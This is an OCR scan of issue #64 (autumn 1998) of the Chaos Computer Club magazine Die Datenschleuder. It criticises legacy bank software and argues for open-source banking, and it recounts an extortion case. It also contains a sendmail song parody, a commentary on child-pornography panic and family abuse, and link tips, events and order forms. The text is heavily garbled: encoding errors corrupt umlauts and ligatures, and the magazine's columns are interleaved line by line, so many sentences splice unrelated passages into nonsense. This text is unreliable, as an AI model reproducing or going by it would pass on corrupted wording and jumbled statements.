der durchschnittliche Banker zu tun hat. Leider Bankensoftware. Banken identiÞziert man nicht
haben wir es an dieser Stelle mit einer Art Selbst- mit Namen, sondern mit Bankleitzahl. Aktien
verteidigungsstrategie der Banken zu tun, denn identiÞziert man nicht mit dem Namen, sondern
sie legen von ihren Protokollen und Programmen mit der Wertpapierkennnummer. Konten
gar nichts offen., ãdenn Sicherheit ist identiÞziert man nicht mit dem Namen und dem
Vertrauenssache...Ò (Werbung der TeleSec fŸr ihr Geburtstag oder sonstwas, sondern per Konto-
Trust-Center, das sie mit dem T†V zusammen nummer. Wir bestreiten nicht, da§ man
betreiben). Ein gutes Beispiel ist allerdings das DatenbankschlŸssel braucht. Aber wieso belŠstigt
SWIFT-Protokoll, mit dem Banken international man die Kunden damit, solche SchlŸssel
ihre †berweisungen abwickeln. FŸr SWIFT kam auswendig zu lernen?

Herbst 1998 Die Datenschleuder #64


...Software-Katastrophen

Auch zeichnet sich Steinzeitsoftware dadurch


aus, da§ Felder in der LŠnge begrenzt werden. So
reservierte die Software eben 4 Zeichen Platz fŸr
die Postleitzahl (ein weiteres Beispiel fŸr
DatenbankschlŸssel). Als sich das dann geŠndert
hat, haben die Banken alle ein gewaltiges Problem
gehabt, weil sie ihre COBOL-Software Þxen
mu§ten und sich das Datenbankschema geŠndert
hat. Und die Konvertierung von Datenbanken
von einem Format in ein anderes fŸhrt immer
eine Downtime mit sich, d.h. Zeit, in der keine
Transaktionen durchgefŸhrt werden kšnnen.
Zwei bayerische Banken zum Beispiel haben sich
gerade zwei Tage Downtime ausbedungen, um
eine Datenbank zu mergen.
WeltfŸhrer fŸr Software-Bloat und feste insbesondere als Order-Routing Verfahren
DatenschlŸssel-LŠngen ist aber SAP. Man hatte innerhalb von Gro§banken. Dort tippen
das konkrete Problem, fŸr jeden Druckjob eine FachkrŠfte die Orders rechts in ein 3270-Terminal
eindeutige Nummer vergeben zu wollen, und ein, die links aus einem Drucker kommen (das ist
diese hatte man auf 4 Stellen begrenzt, weil soviel nicht historisch und auch nicht als Scherz
ja sicher nicht vorkommt. Nun kam bei einem gemeint!). An dieser Stelle wundert man sich
Gro§kunden eben doch soviel vor, weil an einem dann auch nicht mehr Ÿber verlorengegangene
Tag eben sehr viele Belegdaten mitprotokolliert †berweisungen und Orders und die
wurden. Also hat man bei SAP lieber nicht das mehrwšchigen AusfŸhrungszeiten innerhalb
Datenbank-Layout geŠndert, sondern lieber die einer Wertpapierorder, oder wenn mal eine Null
Basis fŸr die Nummern von numerisch auf verloren geht (wir haben Zeugen!).
alphanumerisch geŠndert. Weiterhin mu§te die In einem anderen uns bekannten Fall werden
kanadische Bšrse fŸr ein paar Tage schlie§en, um †berweisungen, die man bei der falschen Filiale
ein Speicherleck zu beheben, als in der Liste der (d.h. nicht der kontofŸhrenden) abgibt, hinten in
ausstehenden Orders fŸr ein Papier zuviele eine Kiste geschmissen und dann ungeprŸft von
EintrŠge storniert wurden, ohne dabei den einem Boten zur kontofŸhrenden Filiale gekarrt.
Speicher wieder freizugeben. Die Postbank verzichtet an dieser Stelle sogar auf
Die Sparkasse hat in Berlin Briefe an Kunden einen Boten zugunsten des eigenen Zustell-
verschickt, wo "PrŸfen Sie doch bitte mal ihre systems, das ja schon anderweitig durch seine
letzten KontoauszŸge, ob da was komisch ZuverlŠssigkeit begeistern konnte.
aussieht" drinstand. TatsŠchlich ist denen die Jetzt stelle man sich den durchschnittlichen
Datenbank gecrasht, als sie ihren Kundenstamm Consultant vor, der mal bei einer Bank gearbeitet
mit dem einer anderen berliner Bank vereint hat, und einen Einblick in die fŸrchterlichen
haben. Altlasten der Banken hatte. Die Personalßuk-
Au§erdem gibt es natŸrlich auch weite Felder, tuation auf dem EDV-Markt ist au§erordentlich
die von der EDV Ÿberhaupt noch nicht erfa§t hoch, und betroffen sind natŸrlich auch die
sind, d.h. die manuell abgehandelt werden. Banken, die gerade jetzt sehr gerne auf externe
Traditionell tritt das vermehrt als Interface Consultants zurŸckgreifen, weil sich auf dem
zwischen verschiedenen EDV-Systemen auf, EDV-Markt niemand Þndet, der dumm genug ist,

Die Datenschleuder #64 Herbst 1998


Open Source Banking!

fŸr die HŠlfte des Gehaltes die MŸllsoftware einer durch Hacking an interne Daten des betroffenen
Bank warten zu mŸssen. Es ist nur eine Frage der Unternehmens gelangt zu sein. Besonders die
Zeit, bis diese massive Ansammlung von ange- Drohung mit einer Veršffentlichung von Belegen
ekelten Programmierern die kritische Masse fŸr Steuerhinterziehungen zeigte schnelle
erreicht und den Banken ihre Systeme um die Wirkung. VorstŠnde von deutschen Gro§unter-
Ohren ßiegen. nehmen jetteten in Learjets durch die Welt, um
Hinzu kommt die Masse an zur Zeit einem aus einer psychatrischen Heilanstalt
entlassenen ArbeitskrŠften, denn die Banken sind entßeuchten Hochstapler fŸr einige tausend Mark
gerade in gro§em Stil dabei, sich von Mitarbeitern eine Packung Leerdisketten abzukaufen. Nach
zu trennen, und auf automatisiertes Banking ohne langwieriger Suche gelang es tatsŠchlich, eines
Beratung von mehreren
umzusteigen. dutzend erpressten
Nachdem wir einen Unternehmen zu
Einblick in den Þnden, das sich
QualitŠtsstandard sicher war, korrekt
der Banksoftware Steuern gezahlt zu
haben, liegt die haben. Auf dieser
Vermutung nahe, Grundlage war es
da§ schon ein dem Unternehmen
verŠrgerter Ex- mšglich, eine
Mitarbeiter eine Anzeige zu
Bank in den Ruin erstatten, die
treiben kšnnte, zusammen mit
wenn man ihn nur anderen Ma§nah-
kurzfristig genug men letztendlich zu
entlŠ§t. einer RŸckfŸhrung
Nick Lesson, der des Herrn
die Barrings-Bank mit seinen etwas UngerbŸhler in seine Klinik fŸhrte.
unkonventionellen Transaktionen Vor dem Hintergrund der drohenden Krisen
heruntergefahren hat, ist da nur ein Beispiel. Die Euro und Jahr-2000 ist der einzige gangbare Weg
InnentŠterquote bei Banken liegt nach diversen eine Open Source Bank. Nur durch eine
Statistiken im Bereich zwischen 70 und 80 vollstŠndige Offenlegung aller Sourcen kšnnen
Prozent. Praktisch kein Fall wird bekannt, da die die Banken den verunsicherten Kunden einen
Beteiligten nichts so sehr fŸrchten wie eine šffent- Grund fŸr ihr Vertrauen liefern. Nur so lie§e sich
liche Behandlung. Der Imageverlust fŸr die das Vertrauen in die eigene EDV dem Kunden
Banken Ÿberwiegt in praktisch allen FŠllen den gegenŸber rechtfertigen. Vertrauen ist gut,
materiellen Schaden deutlich. Kontrolle ist besser.
Bei den Au§entŠtern sieht es nicht viel besser
aus. Der Fall von Markus Sšhnke UngerbŸhler, felix@ccc.de & frank@ccc.de
der auch schon in der Datenschleuder behandelt
wurde, zeigt dies exemplarisch. UngerbŸhler gab
sich als Mitglied des Chaos Computer Club aus
und versuchte Banken, RŸstungsunternehmen
und Šhnliche mit der Behauptung zu erpressen,

Herbst 1998 Die Datenschleuder #64


Hackaraoke

Title - Sendmail
Original - Graceland
Author - N. R. "Norm" Lunde
Intro - Apologies to Paul Simon

Sendmail

The Internet gateways were pinging


Like a pack of submarines
I am traveling through the network
Using traceroute
Blasting out ICMP
I'm talking to sendmail
sendmail
With TCP/IP
I'm talking to sendmail
Daemons and forgers and crackers
And we're all talking to sendmail But I've reason to expect
That I can still connect
My physical layer is 10 Base T With sendmail
It's a lot like my phone cable
But I've reason to expect There is a host in New York City
That I can still connect That dials me up to get UUCP
To sendmail And sometimes when I'm dialing, calling
Or batching up the email I say
Mail comes back to tell me it's bounced Oh, so this is what they need
As if I didn't know that They need a way to talk to sendmail
As if I didn't know her address
As if I had forgotten And they say losing data is a ßaw in the design
Her login doesn't start with 's' Messages should get there all the time
Everybody thinks that they know
And she says losing data is a ßaw in the design About sendmail, sendmail
Messages should get there all the time I'm talking to sendmail
Everybody thinks that they know For reasons I cannot explain
How to talk to sendmail There's some part of me wants to hack
With TCP/IP sendmail
I'm talking to sendmail And I may be obliged to expand
Daemons and forgers and crackers Every alias and bang-path
And we're all talking to sendmail Or maybe there's no way to route it now
And my transport providers Maybe I've a reason to believe
Are streams and Berkeley sockets There's something to receive
I'm looking at streams and Berkeley From sendmail

Die Datenschleuder #64 Herbst 1998


KiPo-Hetze der Kripo

Gern angefragt werden CCCler für Zeitschriftenkiosk und dem von der CDU
Vorträge und Diskussionen. Eines eingefŸhrten Tuttifrutti-Privat-TV die Zahl
der beliebtesten und zugleich mi§brauchter Kinder in den vergangenen
lästigsten Themen ist Jahrzehnten in etwa unverŠndert geblieben ist.
Kinderpornographie im Internet. Mir geht es um die mi§brauchten Kinder,
Ÿberwiegend MŠdchen. Wie kommt es zum Mi§-
brauch und wo Þndet er statt? Genau diese Frage

Z uletzt war dies am 22.09.1998 bei der


Jahrestagung der GI, der Gesellschaft fŸr
Informatik in Magdeburg. Auf dem Podium der
wird in der Regel verschwiegen. Es sind všllig
normale Menschen, všllig normale Familien. Die
Ehe ist monoton bis zerrŸttet, im Bett Þndet
suboptimal vorbereiteten Tagung waren neben nichts mehr statt. Die Frau hat keine Lust mehr,
dem Moderator der GI, Herrn Prof. RŸdiger, noch viel fŸr den einst geliebten Mann zu tun. Der
Herr Piel von der Polizei aus MŸnchen sowie plu- taucht im Leben nur als abendlicher Schatten auf,
to und wau vom CCC. der TV glotzt und sich von ߟssigem Brot
Die Veranstaltung war wie Ÿblich. Der Staats- ernŠhrt. Da besorgt eben die Šlteste Tochter den
vertreter begann mit einem Vortrag, den er mit Haushalt. Oft tut sie das bereits mit zehn bis
einem neuen Begriff garnierte: "PŠdokriminelle". zwšlf Jahren. Irgendwann kommt sie in die
Diesen Hetzbegriff nutzte er recht geschickt zur PubertŠt und spŠtestens dann meint der Vater,
Verteufelung des Internet. "StraftŠter sind die wenn sie fŸr ihn kochen kann, dann gehts auch
Bedrohung" meinte er. Bei den Zahlenangaben im Bett.
praktizierte er das "How to lie with statistics" (das Was soll ein Kind in der Lage tun? Fremde wie
Buch kann bei http://www.loompanics.com bestellt werden) in Frau Nolte anrufen hilft ganz bestimmt nicht,
der Ÿblichen Form. Denn was bitte sagt eine denn die kšnnen sich das Standard-Problem in
Zahlenangabe von "300 PŠdokriminelle pro familiŠrer Form eher nicht vorstellen. Das liegt
Minute im IRC" denn aus? vielleicht an einer rosa christlichen Brille, die
Auch die Nichtunterscheidung zwischen sogar den Mi§brauch von Kindern durch
verschieden zu wertenden Formen der Porno- triebgehemmte Pfarrer mšglichst Ÿbersehen will.
graphie gehšrte zu seinem auf GefŸhlsalarm Der Mutter kann sie es meist auch nicht erzŠhlen,
zielenden Appell gegen Kinderpornographie. denn das gŠbe die nŠchste Katastrophe. Erst
Der Berichterstatter versuchte sich an einer wenn ein paar Jahre spŠter einer jŸngeren
anderen Darstellung. Zum einen verdient der Schwester das gleiche Schicksal droht, bekommt
Begriff "StraftŠter" eine Relativierung. Denn die Mutter Klartext erzŠhlt.
Hacker, die vor zehn Jahren technisch korrekte Dann knallt es in der Familie. Oft ist die
Selbstbaumodems nutzten waren StraftŠter und Tochter reifer als die Mutter und es kommt zu
die Hšchststrafe von fŸnf Jahren nach Par. 15.1 keiner Anzeige. Was soll die noch Šndern? Dem
FAG war mehr als die Strafe fŸr das fahrlŠssige Kind wurde vom Vater die Jugend gestohlen, die
Auslšsen einer atomaren Explosion. Ich erinnerte erste Liebe, das GlŸck und die Freude. Gewalt,
daran, da§ zu Zeiten Konrad Adenauers die Macht und Druck war der Alltag; Geheimnisse
šffentliche Aufstellung von Kondomautomaten und Drohungen die Musik. Das ist keine Story fŸr
wegen Fšrderung der Prostitution verboten war die Yellow Press oder ein TV-Magazin wie
und bereits eine nackte Brustwarze als GRELL-TV. Das Zeigen auf KiPo-Bilder und auf
pornographisch galt. Immerhin bestŠtigte uns der das bšse, bšse Internet ist eine praktische
Polizeivertreter, da§ trotz inzwischen geŠnderter Ersatzhandlung, die ablenken soll von der
Moralvorstellungen mit der Fleischbeschau am BanalitŠt des Bšsen im bekannten Familienalltag.

Herbst 1998 Die Datenschleuder #64


Von den Opfern redet niemand

Die Umwelt schreit empšrt auf: "Was sind das


fŸr Monster, die so etwas tun!" Um sie zu
bekŠmpfen, sollen Cybercops im Internet "anla§-
unabhŠngig" nach Dreck suchen und Internet-
Provider ihre Benutzer Ÿberwachen. Michael
Meister, der stellvertretende Vorsitzende der
Medien-Enquete-Kommission des Bundestages
fordert sogar:
"Man m٤te (dem Internet) eine Redaktion
vorschalten, die auswŠhlt, was ins Netz geht", so
auf http://www.taz.de/~taz/980924.taz/is_T980924.167.html
Die Hetze zeigt Wirkungen. So konnte die
Einrichtung von Gendatenbanken gesellschaftlich
durchgesetzt werden, obwohl die Ausnutzung
herkšmmlicher Ermittlungsmethoden in dem Fall
ausgereicht hŠtte, der dazu mi§braucht wurde. tun was". Stimmungsmache ist besonders elegant
Der Alltag Betroffener ist kein Thema. Eine und das unbekannte Internet ist ein praktisches
junge, mi§brauchte Frau im Frauenzentrum in Mittel um vom eigentlichen Nichtstun
Freiburg erzŠhlte vor etwa zehn Jahren, als abzulenken.
Kindesmi§brauch noch weit mehr Tabuthema Es geht nicht einmal darum, Kinder besser zu
war als heute, in etwa: "ich habe getrŠumt, da§ schŸtzen. Sonst wŸrde man versuchen, Kinder
ich an der Uni war und da§ ich fŸr eine Klausur aufzuklŠren. Und Kindern mehr Rechte geben
eine bessere Bewertung bekommen habe, weil ich statt die Rechte aller einzuschrŠnken. Sonst
es wegen dem Mi§brauch so schwer gehabt habe. wŸrden zuerst mšgliche TŠter ŸberprŸft, bevor
Und dann bin ich aufgewacht und alles war man DNA-Datenbanken anlegt. Sonst wŸrde man
genauso schwer wie vorher und ich wu§te, da§ es Geld in Organisationen wie Wildwasser und
das in unserer Welt nicht gibt". Kinderschutzbund investieren.
Genauso ist es immer noch. Nicht einmal offen Worum es wirklich geht, braucht hier nicht
darŸber sprechen kšnnen die Opfer. Die in ihrer erklŠrt zu werden, denn es liegt auf der Hand
Kindheit von sexueller Gewalt verstšrten Kinder und es zu sehen, bleibt dem intelligenten Leser
mŸssen Jahre ihres Lebens darauf verwenden, um selbst Ÿberlassen.
vom Zustand des †berlebens wieder zum Leben
zu kommen, um wieder Vertrauen zu Þnden und wau@ccc.de (dankt mel@muc.de)
NŠhe ohne Angst erleben zu kšnnen. Diesen
Opfern hilft die Hysterie mit Kinderpornographie
keinen Deut. Es geht auch nicht um die TŠter, die
als Unmenschen dargestellt werden. Wenn es um
Vorbeugung ginge, m٤te versucht werden, zu
verstehen, wie es Ÿberhaupt dazu kommt, da§ sie
TŠter werden. Denn man kann solche Gewalttaten
erst dann wirksam zu verhindern versuchen,
wenn man zumindest einen Teil der GrŸnde
kennt, die dazu fŸhren. Dieser Weg ist unbequem.
Einfacher ist es, nach dem Motto vorzugehen "wir

Die Datenschleuder #64 Herbst 1998


Quellen im Netz

Indiziertes Buch im Netz


Tiedge schwadroniert in seinem Buch Ÿber den
Deutschen Verfassungsschutz. Es enthŠlt Ÿberwie-
gend belanglose Stimmungsbilder, aber einige
Details bezŸglich Abhšr- und †berwachungs-
praktiken waren im RŸckblick rechtswidrig und
sind deshalb politisch peinlich :-)
Volltext 1,2 MB. Kopie ziehen dezentral ist
sinnvoll.

http://www.indocities.com/nobody/tiedge.htm

Security Newsletter from Bruce


Schneier
CRYPTO-GRAM is a free monthly email
newsletter on cryptography from Bruce Schneier
(author of Applied Cryptography, inventor of
BlowÞsh, general crypto pundit andoccasional
crypto curmudgeon).
You can subscribe to CRYPTO-GRAM at
http://www.counterpane.com/crypto-gram.html
or by sending e-mail to <crypto-gram-
subscribe@chaparraltree.com>

Wurstsprengungen und
Münzschrumpfungen
Basteltips nicht gerade fuer den nehmen, da diese auf die Anzahl real
Kindergeburtstag Þnden sich auf der Webpage existierender Koerperteile dekrementierend
von ßeischwulf. Doch braucht es etwas, bis die wirken koennten. FŸr den Rest frei nach dem
Seiten geladen sind, weil er selbst bithaftig bunt Motto "survival of the Þttest" ein Wunsch:
erscheint. Die MŸnzbilder entschŠdigen fŸr die Bitte sendet Erfahrungsberichte an die
Wartezeit. Es Þnden sich Basteltips aller Art frei Redaktion Datenschleuder, ds@ccc.de Anfragen
nach dem Motto "mit Kanonen auf Spatzen und Beschwerden werden ignoriert, Erfahrungen
schie§en". Anders gelingt es kaum, ausgewertet. Wie hei§t es in gewissen
MŸnzschrumpfungen durchzufŸhren oder jugendgefŠhrdenden TV-Serien: ENERGIE!
Wurstsprengungen. http://www.geocities.com/CapeCanaveral/Hanga
Wer eine in der Natur hŠuÞg vorkommende r/9561/
Bedingung erfŸllt und zwei linke HŠnde hat,
sollte von derartigen Experimenten Abstand

Herbst 1998 Die Datenschleuder #64


Termine

4.10.98
Public Domain #89
„Club of Rome“
Ein Blick zurück in die Zukunft. Mit Uwe Möller,
Vorstandsvorsitzender des deutschen Club of Rome.
Details & Anfahrtsbeschreibung siehe
http://www.foebud.org/pd/index.html

Ja!
Auch diesen Dezember wird es wieder einen
Chaos Communication Congress geben. Und
1.11.1998 zwar schon den FŸnfzehnten!
Allerdings wird der Congress dieses Jahr
Public Domain #90 NICHT wieder im Eidelstedter BŸrgerhaus
„Wo bin ich? GPS“ stattÞnden.
Aus dem neuen Veranstaltungsort machen wir
Ralph Schraven berichtet über Funktionsweise und aber noch eine kleine Weile ein Geheimnis bis alle
Anwendungen der Standortbestimmung mittels Global Details ausgearbeitet sind.
Positioning System (GPS). Aktuelle Informationen zum Congress Þndet
Details & Anfahrtsbeschreibung siehe Ihr auf unserer Web Site unter
http://www.foebud.org/pd/index.html http://www.ccc.de/congress98.
Wir hoffen natŸrlich auch dieses Jahr wieder
auf rege Beteiligung auf unter hinter dem
Podium.

6.12.1998
Public Domain #91
„Datenschutzgebiete auf der roten
Liste?“ 15. chaos
communication
Dr. Klaus Brunnstein über Datenspuren im Netz.
Details & Anfahrtsbeschreibung siehe congress
http://www.foebud.org/pd/index.html

Die Datenschleuder #64 Herbst 1998


Mitgliedsanträge und Datenschleuderabonnement Literatur
Bestellungen, MitgliedsantrŠge und

Adre§Šnderungen auch per Mail an


Adre§Šnderungen bitte senden an:

o Satzung + Mitgliedsantrag _____ DM 29,80 Deutsches PGP-Handbuch, 3. Auflage + CD-ROM


CCC e.V., Schwenckestr. 85,

(DM 5,00 in Briefmarken) _____ DM 5,00 Doku zum Tod des „KGB“-Hackers Karl Koch
_____ DM 25,00 Congressdokumentation CCC ‘93
D-20255 Hamburg

o Datenschleuder-Abo _____ DM 25,00 Congressdokumentation CCC ‘95


ofÞce@ccc.de

Normalpreis DM 60,00 für 8 Ausgaben _____ DM 25,00 Congressdokumentation CCC ‘97


_____ DM 50,00 Lockpicking: Über das Öffnen von Schlössern
o Datenschleuder-Abo
Ermäßigter Preis DM 30,00 für 8 Ausgaben Alte Datenschleudern
o Datenschleuder-Abo _____ DM 50,00 Alle Datenschleudern der Jahre 1984-1989
Gewerblicher Preis DM 100,00 für 8 Ausgaben _____ DM 15,00 Alle Datenschleudern des Jahres 1990
(Wir schicken eine Rechnung) _____ DM 15,00 Alle Datenschleudern des Jahres 1991
_____ DM 15,00 Alle Datenschleudern des Jahres 1992
Die Kohle liegt _____ DM 15,00 Alle Datenschleudern des Jahres 1993
_____ DM 15,00 Alle Datenschleudern des Jahres 1994
o als Verrechnungsscheck _____ DM 15,00 Alle Datenschleudern des Jahres 1995
o in Briefmarken _____ DM 15,00 Alle Datenschleudern des Jahres 1996
_____ DM 15,00 Alle Datenschleudern des Jahres 1997
bei bzw.
Sonstiges
o wurde überwiesen am ___.___.______ auf
Chaos Computer Club e.V., Konto 59 90 90-201 _____ DM 50,00 Blaue Töne / POCSAG-Decoder /

Herbst 1998
Postbank Hamburg, BLZ 200 100 20 PC-DES Verschlüsselung
_____ DM 5,00 1 Bogen „Chaos im Äther“
Der Mitgliedsfetzen

_____ DM 5,00 5 Aufkleber „Kabelsalat ist gesund“


Ort/Datum ________________________________________
+ DM 5,00 Portopauschale!

Der Bestellfetzen
Unterschrift ________________________________________ _____ Gesamtbetrag
Die Kohle liegt

Die Datenschleuder #64


Name _______________________________________ o als Verrechnungsscheck (bevorzugt)
o in Briefnarken
Straße _______________________________________ bei bzw.
o wurde überwiesen am ___.___.______ auf
PLZ, Ort _______________________________________ Chaos Computer Club e.V., Konto 59 90 90-201
Postbank Hamburg, BLZ 200 100 20
Tel/Fax _______________________________________
Name ______________________________________________
E-Mail _______________________________________
Straße ______________________________________________
PLZ, Ort _______________________________________________